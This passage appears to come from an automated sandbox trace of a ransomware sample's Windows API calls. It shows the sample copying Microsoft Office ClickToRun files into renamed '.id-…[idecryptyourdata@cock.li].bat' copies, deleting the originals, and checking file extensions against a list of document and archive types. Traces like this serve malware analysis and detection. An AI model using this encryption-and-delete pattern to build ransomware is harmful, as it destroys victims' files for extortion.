shared\\ClickToRun\\AppvIsvStream32.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream32.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0179.132] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream32.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0179.132] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0179.132] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0179.132] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream32.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0179.133] GetLastError () returned 0x0 [0179.133] ReadFile (in: hFile=0x350, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0x60ea0, lpOverlapped=0x0) returned 1 [0179.456] WriteFile (in: hFile=0x354, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0x60eb0, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0x60eb0, lpOverlapped=0x0) returned 1 [0179.463] ReadFile (in: hFile=0x350, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0x0, lpOverlapped=0x0) returned 1 [0179.463] WriteFile (in: hFile=0x354, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0xfa, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0xfa, lpOverlapped=0x0) returned 1 [0179.463] SetEndOfFile (hFile=0x354) returned 1 [0179.463] CloseHandle (hObject=0x354) returned 1 [0179.463] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0179.463] SetEndOfFile (hFile=0x350) returned 1 [0179.466] CloseHandle (hObject=0x350) returned 1 [0179.467] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0179.467] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream32.dll")) returned 1 [0179.467] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll") returned 77 [0179.467] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll") returned 77 [0179.467] lstrlenW (lpString=".doc") returned 4 [0179.467] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0179.467] lstrlenW (lpString=".docx") returned 5 [0179.467] lstrcmpiW (lpString1=".docx", lpString2="2.dll") returned -1 [0179.467] lstrlenW (lpString=".pdf") returned 4 [0179.467] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0179.467] lstrlenW (lpString=".xls") returned 4 [0179.467] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0179.467] lstrlenW (lpString=".xlsx") returned 5 [0179.467] lstrcmpiW (lpString1=".xlsx", lpString2="2.dll") returned -1 [0179.467] lstrlenW (lpString=".ppt") returned 4 [0179.467] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0179.468] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll") returned 77 [0179.468] lstrlenW (lpString=".zip") returned 4 [0179.468] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0179.468] lstrlenW (lpString=".rar") returned 4 [0179.468] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0179.468] lstrlenW (lpString=".bz2") returned 4 [0179.468] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0179.468] lstrlenW (lpString=".7z") returned 3 [0179.468] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0179.468] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll") returned 77 [0179.468] lstrlenW (lpString=".dbf") returned 4 [0179.468] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0179.468] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll") returned 77 [0179.468] lstrlenW (lpString=".1cd") returned 4 [0179.468] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0179.468] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll") returned 77 [0179.468] lstrlenW (lpString=".jpg") returned 4 [0179.468] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0179.468] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll") returned 77 [0179.468] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll") returned 77 [0179.468] lstrlenW (lpString=".doc") returned 4 [0179.468] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0179.468] lstrlenW (lpString=".docx") returned 5 [0179.468] lstrcmpiW (lpString1=".docx", lpString2="2.dll") returned -1 [0179.468] lstrlenW (lpString=".pdf") returned 4 [0179.468] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0179.468] lstrlenW (lpString=".xls") returned 4 [0179.468] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0179.468] lstrlenW (lpString=".xlsx") returned 5 [0179.468] lstrcmpiW (lpString1=".xlsx", lpString2="2.dll") returned -1 [0179.468] lstrlenW (lpString=".ppt") returned 4 [0179.468] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0179.468] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll") returned 77 [0179.468] lstrlenW (lpString=".zip") returned 4 [0179.468] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0179.468] lstrlenW (lpString=".rar") returned 4 [0179.469] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0179.469] lstrlenW (lpString=".bz2") returned 4 [0179.469] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0179.469] lstrlenW (lpString=".7z") returned 3 [0179.469] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0179.469] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll") returned 77 [0179.469] lstrlenW (lpString=".dbf") returned 4 [0179.469] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0179.469] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll") returned 77 [0179.469] lstrlenW (lpString=".1cd") returned 4 [0179.469] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0179.469] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll") returned 77 [0179.469] lstrlenW (lpString=".jpg") returned 4 [0179.469] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0179.469] lstrcmpiW (lpString1=".exe", lpString2=".bat") returned 1 [0179.469] lstrlenW (lpString="AppVShNotify.exe") returned 16 [0179.469] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVShNotify.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvshnotify.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0179.469] GetFileSizeEx (in: hFile=0x350, lpFileSize=0x375ff14 | out: lpFileSize=0x375ff14*=263896) returned 1 [0179.470] CloseHandle (hObject=0x350) returned 1 [0179.470] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVShNotify.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvshnotify.exe")) returned 0x20 [0179.470] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVShNotify.exe.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvshnotify.exe.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0179.470] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVShNotify.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvshnotify.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0179.470] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0179.470] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0179.470] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVShNotify.exe.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvshnotify.exe.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0179.471] GetLastError () returned 0x0 [0179.471] ReadFile (in: hFile=0x350, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0x406d8, lpOverlapped=0x0) returned 1 [0179.553] WriteFile (in: hFile=0x354, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0x406e0, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0x406e0, lpOverlapped=0x0) returned 1 [0179.557] ReadFile (in: hFile=0x350, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0x0, lpOverlapped=0x0) returned 1 [0179.557] WriteFile (in: hFile=0x354, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0xf4, lpOverlapped=0x0) returned 1 [0179.558] SetEndOfFile (hFile=0x354) returned 1 [0179.558] CloseHandle (hObject=0x354) returned 1 [0179.558] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0179.558] SetEndOfFile (hFile=0x350) returned 1 [0179.561] CloseHandle (hObject=0x350) returned 1 [0179.561] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVShNotify.exe.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0179.561] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVShNotify.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvshnotify.exe")) returned 1 [0179.561] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVShNotify.exe") returned 74 [0179.561] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVShNotify.exe") returned 74 [0179.561] lstrlenW (lpString=".doc") returned 4 [0179.561] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0179.561] lstrlenW (lpString=".docx") returned 5 [0179.561] lstrcmpiW (lpString1=".docx", lpString2="y.exe") returned -1 [0179.561] lstrlenW (lpString=".pdf") returned 4 [0179.561] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0179.561] lstrlenW (lpString=".xls") returned 4 [0179.561] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0179.561] lstrlenW (lpString=".xlsx") returned 5 [0179.561] lstrcmpiW (lpString1=".xlsx", lpString2="y.exe") returned -1 [0179.561] lstrlenW (lpString=".ppt") returned 4 [0179.561] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0179.561] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVShNotify.exe") returned 74 [0179.561] lstrlenW (lpString=".zip") returned 4 [0179.562] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0179.562] lstrlenW (lpString=".rar") returned 4 [0179.562] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0179.562] lstrlenW (lpString=".bz2") returned 4 [0179.562] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0179.562] lstrlenW (lpString=".7z") returned 3 [0179.562] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0179.562] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVShNotify.exe") returned 74 [0179.562] lstrlenW (lpString=".dbf") returned 4 [0179.562] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0179.562] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVShNotify.exe") returned 74 [0179.562] lstrlenW (lpString=".1cd") returned 4 [0179.562] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0179.562] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVShNotify.exe") returned 74 [0179.562] lstrlenW (lpString=".jpg") returned 4 [0179.562] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0179.562] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVShNotify.exe") returned 74 [0179.562] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVShNotify.exe") returned 74 [0179.562] lstrlenW (lpString=".doc") returned 4 [0179.562] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0179.562] lstrlenW (lpString=".docx") returned 5 [0179.562] lstrcmpiW (lpString1=".docx", lpString2="y.exe") returned -1 [0179.562] lstrlenW (lpString=".pdf") returned 4 [0179.562] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0179.562] lstrlenW (lpString=".xls") returned 4 [0179.562] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0179.562] lstrlenW (lpString=".xlsx") returned 5 [0179.562] lstrcmpiW (lpString1=".xlsx", lpString2="y.exe") returned -1 [0179.562] lstrlenW (lpString=".ppt") returned 4 [0179.562] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0179.562] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVShNotify.exe") returned 74 [0179.562] lstrlenW (lpString=".zip") returned 4 [0179.562] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0179.563] lstrlenW (lpString=".rar") returned 4 [0179.563] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0179.563] lstrlenW (lpString=".bz2") returned 4 [0179.563] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0179.563] lstrlenW (lpString=".7z") returned 3 [0179.563] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0179.563] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVShNotify.exe") returned 74 [0179.563] lstrlenW (lpString=".dbf") returned 4 [0179.563] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0179.563] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVShNotify.exe") returned 74 [0179.563] lstrlenW (lpString=".1cd") returned 4 [0179.563] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0179.563] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVShNotify.exe") returned 74 [0179.563] lstrlenW (lpString=".jpg") returned 4 [0179.563] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0179.563] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0179.563] lstrlenW (lpString="C2R32.dll") returned 9 [0179.563] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0179.563] GetFileSizeEx (in: hFile=0x350, lpFileSize=0x375ff14 | out: lpFileSize=0x375ff14*=820416) returned 1 [0179.564] CloseHandle (hObject=0x350) returned 1 [0179.564] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r32.dll")) returned 0x20 [0179.564] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R32.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r32.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0179.564] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r32.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0179.564] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0179.564] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0179.564] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R32.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r32.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0179.565] GetLastError () returned 0x0 [0179.565] ReadFile (in: hFile=0x350, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0xc84c0, lpOverlapped=0x0) returned 1 [0179.707] WriteFile (in: hFile=0x354, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0xc84d0, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0xc84d0, lpOverlapped=0x0) returned 1 [0179.724] ReadFile (in: hFile=0x350, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0x0, lpOverlapped=0x0) returned 1 [0179.724] WriteFile (in: hFile=0x354, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0xe6, lpOverlapped=0x0) returned 1 [0179.724] SetEndOfFile (hFile=0x354) returned 1 [0179.724] CloseHandle (hObject=0x354) returned 1 [0179.724] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0179.725] SetEndOfFile (hFile=0x350) returned 1 [0179.732] CloseHandle (hObject=0x350) returned 1 [0179.732] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R32.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0179.732] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r32.dll")) returned 1 [0179.732] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R32.dll") returned 67 [0179.732] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R32.dll") returned 67 [0179.732] lstrlenW (lpString=".doc") returned 4 [0179.732] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0179.732] lstrlenW (lpString=".docx") returned 5 [0179.732] lstrcmpiW (lpString1=".docx", lpString2="2.dll") returned -1 [0179.732] lstrlenW (lpString=".pdf") returned 4 [0179.732] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0179.732] lstrlenW (lpString=".xls") returned 4 [0179.732] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0179.732] lstrlenW (lpString=".xlsx") returned 5 [0179.732] lstrcmpiW (lpString1=".xlsx", lpString2="2.dll") returned -1 [0179.732] lstrlenW (lpString=".ppt") returned 4 [0179.733] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0179.733] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R32.dll") returned 67 [0179.733] lstrlenW (lpString=".zip") returned 4 [0179.733] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0179.733] lstrlenW (lpString=".rar") returned 4 [0179.733] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0179.733] lstrlenW (lpString=".bz2") returned 4 [0179.733] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0179.733] lstrlenW (lpString=".7z") returned 3 [0179.733] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0179.733] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R32.dll") returned 67 [0179.733] lstrlenW (lpString=".dbf") returned 4 [0179.733] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0179.733] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R32.dll") returned 67 [0179.733] lstrlenW (lpString=".1cd") returned 4 [0179.733] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0179.733] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R32.dll") returned 67 [0179.733] lstrlenW (lpString=".jpg") returned 4 [0179.733] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0179.733] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R32.dll") returned 67 [0179.733] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R32.dll") returned 67 [0179.733] lstrlenW (lpString=".doc") returned 4 [0179.733] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0179.733] lstrlenW (lpString=".docx") returned 5 [0179.733] lstrcmpiW (lpString1=".docx", lpString2="2.dll") returned -1 [0179.733] lstrlenW (lpString=".pdf") returned 4 [0179.733] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0179.733] lstrlenW (lpString=".xls") returned 4 [0179.733] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0179.733] lstrlenW (lpString=".xlsx") returned 5 [0179.733] lstrcmpiW (lpString1=".xlsx", lpString2="2.dll") returned -1 [0179.733] lstrlenW (lpString=".ppt") returned 4 [0179.733] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0179.734] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R32.dll") returned 67 [0179.734] lstrlenW (lpString=".zip") returned 4 [0179.734] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0179.734] lstrlenW (lpString=".rar") returned 4 [0179.734] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0179.734] lstrlenW (lpString=".bz2") returned 4 [0179.734] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0179.734] lstrlenW (lpString=".7z") returned 3 [0179.734] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0179.734] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R32.dll") returned 67 [0179.734] lstrlenW (lpString=".dbf") returned 4 [0179.734] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0179.734] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R32.dll") returned 67 [0179.734] lstrlenW (lpString=".1cd") returned 4 [0179.734] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0179.734] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R32.dll") returned 67 [0179.734] lstrlenW (lpString=".jpg") returned 4 [0179.734] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0179.734] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0179.734] lstrlenW (lpString="C2R64.dll") returned 9 [0179.734] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r64.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0179.734] GetFileSizeEx (in: hFile=0x350, lpFileSize=0x375ff14 | out: lpFileSize=0x375ff14*=1208928) returned 1 [0179.734] CloseHandle (hObject=0x350) returned 1 [0179.735] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r64.dll")) returned 0x20 [0179.735] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R64.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r64.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0179.735] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r64.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.735] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R64.dll") returned 67 [0179.735] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R64.dll") returned 67 [0179.735] lstrlenW (lpString=".doc") returned 4 [0179.735] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0179.735] lstrlenW (lpString=".docx") returned 5 [0179.735] lstrcmpiW (lpString1=".docx", lpString2="4.dll") returned -1 [0179.735] lstrlenW (lpString=".pdf") returned 4 [0179.735] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0179.735] lstrlenW (lpString=".xls") returned 4 [0179.735] lstrcmpiW (lpString1=".xls", 